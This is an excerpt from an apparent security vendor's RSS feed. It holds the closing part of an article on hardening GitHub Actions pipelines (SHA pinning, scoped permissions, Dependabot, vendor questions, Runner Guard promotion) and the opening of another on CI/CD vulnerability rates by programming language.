 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Scan everything.&lt;/strong&gt; Run &lt;code&gt;runner-guard scan&lt;/code&gt; across all repos in your organization. Use GitHub’s API or a simple shell loop to enumerate repos and scan each one. The JSON output format (&lt;code&gt;--format json&lt;/code&gt;) makes aggregation straightforward.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Prioritize by risk.&lt;/strong&gt; Sort repos by severity and compound vulnerability count. Repos with critical findings and compound patterns (RGS-007 + RGS-008) are the highest priority - they represent complete attack chains.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Batch autofix.&lt;/strong&gt; Run &lt;code&gt;runner-guard fix .&lt;/code&gt; across all repos to generate SHA-pinned workflow files. Review the diffs in batch and submit PRs.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Standardize permissions.&lt;/strong&gt; Create a GitHub Actions workflow template for your organization with explicit &lt;code&gt;permissions:&lt;/code&gt; blocks. Require all new repos to use the template.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Configure Dependabot org-wide.&lt;/strong&gt; Use GitHub’s organization-level Dependabot configuration to enable GitHub Actions dependency updates across all repos simultaneously.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Baseline and track.&lt;/strong&gt; Establish a baseline finding count and track it over time. CI/CD security degrades continuously - developers add new actions, change triggers, expand permissions. Without tracking, you’ll drift back to the starting state within months.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;h2&gt;The Dependabot Gap&lt;/h2&gt; 
&lt;p&gt;GitHub provides Dependabot with built-in support for SHA-pinning GitHub Actions. The configuration is three lines. The tooling is free. The adoption is near zero.&lt;/p&gt; 
&lt;p&gt;This is the most frustrating gap in the dataset. GitHub has solved the tooling problem. They haven’t solved the awareness problem. Every new repo created from GitHub’s starter templates starts with unpinned actions. The Dependabot GitHub Actions ecosystem isn’t configured by default. The documentation examples use version tags.&lt;/p&gt; 
&lt;p&gt;Until the defaults change, the fix lives with individual maintainers and organizations. The good news: the fix is fast, automated, and free.&lt;/p&gt; 
&lt;h2&gt;Consuming Open Source Safely - For Organizations and Individuals&lt;/h2&gt; 
&lt;p&gt;The fixes above address what you build. This section addresses what you consume - both the open-source code you pull directly and the open-source code embedded in the commercial products you purchase.&lt;/p&gt; 
&lt;h3&gt;The Liability Reality&lt;/h3&gt; 
&lt;p&gt;Every open-source license in our dataset - MIT, Apache, GPL, BSD, AGPL - contains a variation of the same clause: &lt;strong&gt;the software is provided “as is,” without warranty, and the authors are not liable for any damages.&lt;/strong&gt; When you reference &lt;code&gt;softprops/action-gh-release@v2&lt;/code&gt; in your workflow, you’re running code from a single-maintainer GitHub account with access to your secrets, under a license that explicitly says no one is responsible if something goes wrong.&lt;/p&gt; 
&lt;p&gt;This isn’t a flaw in open source. It’s the model. Maintainers can’t guarantee security for every context. But the implication is clear: &lt;strong&gt;you are the last line of defense.&lt;/strong&gt; Not the maintainer. Not GitHub. Not the license. You.&lt;/p&gt; 
&lt;h3&gt;Direct Consumption - When You Use Open Source&lt;/h3&gt; 
&lt;p&gt;If your CI/CD pipelines reference third-party GitHub Actions, you’re a direct consumer:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Always review code before trusting it.&lt;/strong&gt; SHA pinning forces a deliberate review - you choose a specific commit to trust. Mutable tags skip the review entirely and trust whatever happens to be there when your pipeline runs.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Establish an action allow-list.&lt;/strong&gt; Maintain an approved list of GitHub Actions for your organization. New actions require a security review before being added. This prevents individual developers from introducing unvetted supply chain dependencies.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Monitor maintainer health.&lt;/strong&gt; A single-maintainer action that hasn’t been updated in six months is a different risk from an org-maintained action with active contributors. Watch for: dormant maintainers, account ownership changes, sudden spikes in commit activity (potential compromise), and expired domain registrations on maintainer email accounts.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Fork critical dependencies.&lt;/strong&gt; For actions your pipeline can’t function without - your setup action, your deployment action, your release action - consider forking and maintaining internally. You control the tags. You control the code. The upstream maintainer’s account security no longer determines your pipeline’s security.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Run Runner Guard in CI.&lt;/strong&gt; Add Runner Guard as a step in your CI pipeline that scans your workflow files on every change. New vulnerabilities are caught at the PR stage, before they merge. Prevention beats detection.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Treat workflow files as security-critical code.&lt;/strong&gt; Changes to &lt;code&gt;.github/workflows/&lt;/code&gt; should require the same review rigor as changes to authentication logic or payment processing. A CODEOWNERS file that requires security team approval for workflow modifications is a straightforward control.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;h3&gt;Indirect Consumption - When Your Vendors Use Open Source&lt;/h3&gt; 
&lt;p&gt;Every commercial product you purchase was built with open source. The vendor’s CI/CD pipeline almost certainly runs on GitHub Actions, GitLab CI, or a similar platform. The vendor’s build dependencies include the same unpinned actions and single-maintainer chokepoints we documented in this research. Your vendor’s supply chain risk is your supply chain risk.&lt;/p&gt; 
&lt;p&gt;Questions to ask your technology vendors:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;How do you secure your CI/CD pipeline?&lt;/strong&gt; If the answer doesn’t include SHA pinning, permission scoping, and regular pipeline audits, their build system may be vulnerable to the same attack chains we documented across 20,265 repos.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Do you use open-source GitHub Actions? Which ones?&lt;/strong&gt; A vendor running &lt;code&gt;docker/login-action@v3&lt;/code&gt; in their build pipeline inherits Docker’s concentration risk. A vendor using single-maintainer actions inherits that maintainer’s account security as a dependency.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;How do you validate your build artifacts?&lt;/strong&gt; Software supply chain integrity doesn’t end at source code. Artifact attestation, reproducible builds, and SLSA compliance provide evidence that the binary you received was built from the source code you reviewed.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;What happens when a CI/CD dependency is compromised?&lt;/strong&gt; The tj-actions/changed-files incident in March 2025 affected thousands of repos. Your vendor’s incident response plan should account for supply chain compromises in their build tooling - not just vulnerabilities in their application code.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Do you scan your CI/CD configurations with a tool like Runner Guard?&lt;/strong&gt; If not, the vendor may not know about vulnerabilities in their own build pipeline. Point them to this research to understand the scope of the problem across 50K repos.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The organizations with the most mature security programs extend their vendor risk assessments beyond application security (penetration tests, SOC 2 reports, code audits) to include CI/CD pipeline security. A vendor with a clean penetration test report and an insecure build pipeline has a gap that traditional assessments don’t cover.&lt;/p&gt; 
&lt;h3&gt;The Shared Responsibility Model&lt;/h3&gt; 
&lt;p&gt;Open-source security follows a shared responsibility model, whether anyone has named it that or not:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Maintainers&lt;/strong&gt; are responsible for the code they write and the releases they publish&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Platform providers&lt;/strong&gt; (GitHub, GitLab) are responsible for the infrastructure the code runs on&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Consumers&lt;/strong&gt; - you - are responsible for how you integrate, configure, and trust that code in your environment&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;The gap in this model is the CI/CD pipeline. Maintainers write the code. GitHub provides the runners. But nobody is systematically reviewing how the code gets from repository to runner to production. That’s the gap our 50K-repo scan quantified - and it’s the gap you need to close in your own pipelines and your vendors’ pipelines.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It - The Priority List&lt;/h2&gt; 
&lt;p&gt;If you have limited time, fix in this order:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;strong&gt;SHA-pin all actions&lt;/strong&gt; (&lt;code&gt;runner-guard fix .&lt;/code&gt;) - eliminates the supply chain entry point&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Scope permissions&lt;/strong&gt; - add &lt;code&gt;permissions:&lt;/code&gt; blocks with minimum required access&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Fix expression injection&lt;/strong&gt; - move attacker-controlled variables to environment variables&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Add Dependabot for Actions&lt;/strong&gt; - keeps SHA pins current automatically&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Audit triggers&lt;/strong&gt; - switch from &lt;code&gt;pull_request_target&lt;/code&gt; to &lt;code&gt;pull_request&lt;/code&gt; where possible&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The first two items take under five minutes for most repos. Items 3-5 may require workflow logic changes, but the fixes are well-documented and straightforward.&lt;/p&gt; 
&lt;p&gt;246,496 findings in our dataset are auto-fixable today. The scanner is free. The fixes are simple. The question isn’t whether to fix your CI/CD - it’s why you haven’t already.&lt;/p&gt; 
&lt;p&gt;But fixing once isn’t enough. Developers add new workflow steps, new action dependencies, and new triggers every week. A repo that’s clean today can have five new findings by next month. Point-in-time scanning catches the current state. &lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Continuous monitoring&lt;/a&gt; catches the drift. The goal isn’t just fixing your pipelines - it’s keeping them fixed.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;The Docker Chokepoint - One Org, Six Actions, Thousands of Pipelines&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;Anatomy of a CI/CD Chain Attack - From Recon to Exfiltration in 5 Steps&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI Agents as Force Multipliers - The Next Evolution of Supply Chain Attacks&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security"&gt;The Language Risk Matrix - Why Rust Repos Are the Most Vulnerable&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests"&gt;What’s Next - Fixing 50K Repos, One PR at a Time&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Beyond Snapshots - Why CI/CD Security Needs Continuous Monitoring&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Start with a scan. Stay with continuous monitoring.&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;&lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; gives you the one-time scan - free, open-source, 14 security rules. For continuous CI/CD pipeline monitoring across your entire vendor chain, &lt;a href="https://vigilantcybersecurity.com/threatcert"&gt;ThreatCert&lt;/a&gt; runs every 60 minutes, correlating CI/CD findings with 6 other intelligence domains.&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://vigilantcybersecurity.com/threatcert" class="v-btn v-btn-secondary"&gt;See ThreatCert&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Ffix-cicd-security-sha-pinning-least-privilege&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 18:11:31 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege</guid>
      <dc:date>2026-03-24T18:11:31Z</dc:date>
    </item>
    <item>
      <title>The Language Risk Matrix — Why Rust Repos Are the Most Vulnerable</title>
      <link>https://vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/10-language-risk-matrix.png" alt="The Language Risk Matrix — Why Rust Repos Are the Most Vulnerable" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
   Chris Nyhuis 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
   CEO, Vigilant 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
   10 min read 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;The language famous for eliminating memory bugs at compile time has the most insecure CI/CD pipelines in our dataset. Your Rust code is memory-safe. Your Rust CI is not.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;When we &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;scanned GitHub’s top 50K repos&lt;/a&gt; for CI/CD vulnerabilities, we expected the vulnerability distribution to be roughly uniform across programming languages. It isn’t. The spread from top to bottom is over 3x - from Rust at 77.9% to JavaScript at 23.6%. Language choice doesn’t cause CI/CD vulnerabilities, but it strongly correlates with them. Understanding why tells us something fundamental about where supply chain risk concentrates.&lt;/p&gt; 
&lt;h2&gt;The Full Matrix&lt;/h2&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/10-language-risk-matrix.png" alt="Language Risk Matrix - CI/CD Vulnerability Rates by Language" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Language&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Vuln Repos&lt;/th&gt; 
   &lt;th&gt;Vuln Rate&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Rust&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;2,903&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;2,261&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;77.9%&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Elixir&lt;/td&gt; 
   &lt;td&gt;278&lt;/td&gt; 
   &lt;td&gt;187&lt;/td&gt; 
   &lt;td&gt;67.3%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;TypeScript&lt;/td&gt; 
   &lt;td&gt;4,338&lt;/td&gt; 
   &lt;td&gt;2,675&lt;/td&gt; 
   &lt;td&gt;61.7%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Haskell&lt;/td&gt; 
   &lt;td&gt;221&lt;/td&gt; 
   &lt;td&gt;121&lt;/td&gt; 
   &lt;td&gt;54.8%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;PHP&lt;/td&gt; 
   &lt;td&gt;2,508&lt;/td&gt; 
   &lt;td&gt;1,373&lt;/td&gt; 
   &lt;td&gt;54.7%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Scala&lt;/td&gt; 
   &lt;td&gt;380&lt;/td&gt; 
   &lt;td&gt;207&lt;/td&gt; 
   &lt;td&gt;54.5%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Go&lt;/td&gt; 
   &lt;td&gt;3,878&lt;/td&gt; 
   &lt;td&gt;2,088&lt;/td&gt; 
   &lt;td&gt;53.8%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Dart&lt;/td&gt; 
   &lt;td&gt;858&lt;/td&gt; 
   &lt;td&gt;453&lt;/td&gt; 
   &lt;td&gt;52.8%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Ruby&lt;/td&gt; 
   &lt;td&gt;1,954&lt;/td&gt; 
   &lt;td&gt;1,000&lt;/td&gt; 
   &lt;td&gt;51.2%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Kotlin&lt;/td&gt; 
   &lt;td&gt;1,716&lt;/td&gt; 
   &lt;td&gt;832&lt;/td&gt; 
   &lt;td&gt;48.5%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;C++&lt;/td&gt; 
   &lt;td&gt;3,561&lt;/td&gt; 
   &lt;td&gt;1,471&lt;/td&gt; 
   &lt;td&gt;41.3%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Python&lt;/td&gt; 
   &lt;td&gt;4,810&lt;/td&gt; 
   &lt;td&gt;1,900&lt;/td&gt; 
   &lt;td&gt;39.5%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;C#&lt;/td&gt; 
   &lt;td&gt;2,759&lt;/td&gt; 
   &lt;td&gt;994&lt;/td&gt; 
   &lt;td&gt;36.0%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;C&lt;/td&gt; 
   &lt;td&gt;3,147&lt;/td&gt; 
   &lt;td&gt;1,009&lt;/td&gt; 
   &lt;td&gt;32.1%&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;JavaScript&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;4,460&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;1,064&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;&lt;strong&gt;23.6%&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;This data comes from 2,903 Rust repos and 4,460 JavaScript repos - large enough samples that the difference isn’t noise. The Rust sample tripled from our initial 1,042-repo checkpoint to the full 2,903 across the 50K scan, and Rust held its position at number one. The pattern is real.&lt;/p&gt; 
&lt;h2&gt;The Rust Paradox&lt;/h2&gt; 
&lt;p&gt;Rust’s headline is designed to provoke - and it should. The language that prevents use-after-free, buffer overflows, and data races at compile time has the worst CI/CD security posture in our dataset. Nearly four out of five Rust repos have at least one vulnerable workflow.&lt;/p&gt; 
&lt;p&gt;The paradox resolves when you look at what Rust’s build toolchain requires:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Cross-compilation complexity.&lt;/strong&gt; Rust’s value proposition includes zero-cost abstractions across platforms - but cross-compiling for Linux, macOS, Windows, ARM, and WASM requires multi-step CI configurations with platform-specific actions. Each target in a build matrix adds action dependencies.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Toolchain management.&lt;/strong&gt; Most Rust repos depend on dtolnay/rust-toolchain for compiler setup. As we detail in &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis&lt;/a&gt;, &lt;code&gt;rust-toolchain&lt;/code&gt; is a single-maintainer action with 989 unpinned repos and 44 unique mutable refs - including 201 repos pinned to &lt;code&gt;@master&lt;/code&gt;. This single dependency is the largest contributor to Rust’s vulnerability rate.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Cache management.&lt;/strong&gt; Rust builds are slow. To compensate, most repos use Swatinem/rust-cache - another single-maintainer action - to cache compiled artifacts. That’s a second single-person dependency in nearly every Rust CI pipeline.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Release pipeline complexity.&lt;/strong&gt; Rust projects typically build and publish binaries for multiple platforms, using actions like &lt;code&gt;cargo-dist&lt;/code&gt;, &lt;code&gt;cargo-release&lt;/code&gt;, and various cross-compilation tools. Each one adds to the dependency chain.&lt;/p&gt; 
&lt;p&gt;The result: a typical Rust CI workflow has 3-5 third-party action dependencies before it even runs &lt;code&gt;cargo test&lt;/code&gt;. Each dependency is another &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain trust decision&lt;/a&gt; that nobody is SHA-pinning.&lt;/p&gt; 
&lt;p&gt;The irony is structural: the language that eliminates entire classes of runtime bugs through its type system has its trust model end at the compiler binary. Everything about how that compiler gets into the CI environment - which action downloads it, which version, from whose repository - operates on implicit trust.&lt;/p&gt; 
&lt;h2&gt;Why JavaScript Is Lowest&lt;/h2&gt; 
&lt;p&gt;JavaScript’s 23.6% vulnerability rate is the mirror image of Rust’s 77.9%. The explanation is similarly structural:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Simple CI pipelines.&lt;/strong&gt; A typical JavaScript/Node.js CI workflow is three lines: &lt;code&gt;actions/checkout&lt;/code&gt;, &lt;code&gt;actions/setup-node&lt;/code&gt;, and &lt;code&gt;npm test&lt;/code&gt;. Both &lt;code&gt;actions/checkout&lt;/code&gt; and &lt;code&gt;actions/setup-node&lt;/code&gt; are first-party GitHub actions with broad adoption and often SHA-pinned. The third-party dependency count is minimal.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Mature ecosystem tooling.&lt;/strong&gt; NPM, Yarn, and pnpm handle dependency management, building, and publishing without requiring third-party CI actions. The build toolchain lives in the package manager, not in the workflow file.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Lower CI/CD ambition.&lt;/strong&gt; JavaScript repos less frequently attempt multi-platform builds, binary distribution, or complex release automation in their GitHub Actions workflows. Less complexity means less attack surface.&lt;/p&gt; 
&lt;p&gt;JavaScript’s low vulnerability rate doesn’t mean JavaScript projects are more secure overall - they face their own supply chain risks through npm package dependencies. But at the CI/CD pipeline level, simpler workflows mean fewer action dependencies, and fewer dependencies mean fewer findings.&lt;/p&gt; 
&lt;h2&gt;The Middle Ground - Correlation, Not Causation&lt;/h2&gt; 
&lt;p&gt;It’s important to be precise about what this data shows. The language itself doesn’t cause CI/CD vulnerabilities. The CI/CD complexity that each language ecosystem demands is the causal factor.&lt;/p&gt; 
&lt;p&gt;Languages cluster by CI complexity:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;High complexity (50%+ vuln rate):&lt;/strong&gt; Rust, Elixir, TypeScript, Haskell, PHP, Scala, Go, Dart, Ruby. These languages share characteristics: complex build toolchains, cross-compilation needs, or heavy reliance on third-party CI actions for setup and deployment.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Medium complexity (35-50%):&lt;/strong&gt; Kotlin, C++, Python. Moderate CI needs - some third-party action usage, but less platform-specific complexity than the top tier.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Low complexity (under 35%):&lt;/strong&gt; C#, C, JavaScript. Simpler CI pipelines with fewer third-party dependencies.&lt;/p&gt; 
&lt;p&gt;The pattern holds across the dataset: languages whose ecosystems drive developers toward complex, multi-action CI workflows have higher vulnerability rates. Languages where a basic CI pipeline requires minimal third-party actions have lower rates.&lt;/p&gt; 
&lt;h2&gt;PHP and Ruby - The Setup Action Trap&lt;/h2&gt; 
&lt;p&gt;PHP at 54.7% and Ruby at 51.2% share a common pattern: their CI vulnerability rates are driven largely by one action each.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;PHP&lt;/strong&gt; repos rely on shivammathur/setup-php - a single-maintainer action used by 1,147 repos in our dataset. It’s THE PHP setup action. There’s no meaningful alternative. If you’re running PHP CI on GitHub Actions, you’re almost certainly using this action, and you’re almost certainly using it with a mutable version tag.&lt;/p&gt; 
&lt;p&gt;This action is maintained by a single account. 1,147 repos - spanning major CMS platforms, e-commerce frameworks, and API tooling - depend on one person’s GitHub account to deliver their PHP build environment. This is the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;single-maintainer problem&lt;/a&gt; concentrated in a single language ecosystem.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Ruby&lt;/strong&gt; repos show a similar pattern with ruby/setup-ruby at 1,275 repos. The difference: ruby/setup-ruby is maintained by the Ruby GitHub organization, not an individual - so the fragility risk is lower. But the concentration risk remains. Over a thousand repos depend on the same action, overwhelmingly unpinned.&lt;/p&gt; 
&lt;p&gt;Both ecosystems also have secondary dependencies. PHP repos commonly pair setup-php with codecov/codecov-action for coverage reporting. Ruby repos pair setup-ruby with various gem publishing and test reporting actions. Each additional action extends the chain.&lt;/p&gt; 
&lt;h2&gt;Go - The Container Builder&lt;/h2&gt; 
&lt;p&gt;Go at 53.8% vulnerability rate sits squarely in the “high complexity” tier, driven by two factors:&lt;/p&gt; 
&lt;p&gt;Go’s compilation model produces static binaries, which encourages multi-platform binary distribution. Go CI workflows frequently build for Linux (amd64, arm64), macOS (amd64, arm64), and Windows - each target potentially using different actions for setup, build, and release. The release pipeline often involves goreleaser (a popular release automation tool) and Docker actions for container packaging.&lt;/p&gt; 
&lt;p&gt;Go repos are among the heaviest users of &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;Docker actions&lt;/a&gt; - login, buildx, build-push - because Go’s compiled binaries are commonly packaged as container images. This means Go repos inherit Docker’s concentration risk on top of their own language-specific dependencies.&lt;/p&gt; 
&lt;p&gt;The Go ecosystem doesn’t have a single dominant setup action like Rust’s &lt;code&gt;rust-toolchain&lt;/code&gt; or PHP’s &lt;code&gt;setup-php&lt;/code&gt; - &lt;code&gt;actions/setup-go&lt;/code&gt; is first-party and commonly SHA-pinned. But the release and distribution phase adds complexity that drives the overall rate above 50%.&lt;/p&gt; 
&lt;h2&gt;The Elixir Surprise&lt;/h2&gt; 
&lt;p&gt;Elixir at 67.3% - second only to Rust - is the less-obvious finding. Elixir’s sample is smaller (278 repos), but the rate is striking for a language not typically associated with complex CI/CD.&lt;/p&gt; 
&lt;p&gt;The explanation maps to the same pattern: Elixir’s Mix-based build system drives complex CI configurations with Erlang/OTP version management, multiple release targets, and Phoenix-specific deployment workflows. The Elixir community is small but passionate about automation, and that automation means more action dependencies.&lt;/p&gt; 
&lt;p&gt;Haskell at 54.8% follows the same logic - cabal and stack toolchains require specific CI setup actions, and the Haskell CI ecosystem has fewer maintained options, concentrating dependencies.&lt;/p&gt; 
&lt;h2&gt;The Trust Paradox by Language&lt;/h2&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;Trust Paradox&lt;/a&gt; - where the most trusted organizations have the most exposed pipelines - manifests differently across language ecosystems.&lt;/p&gt; 
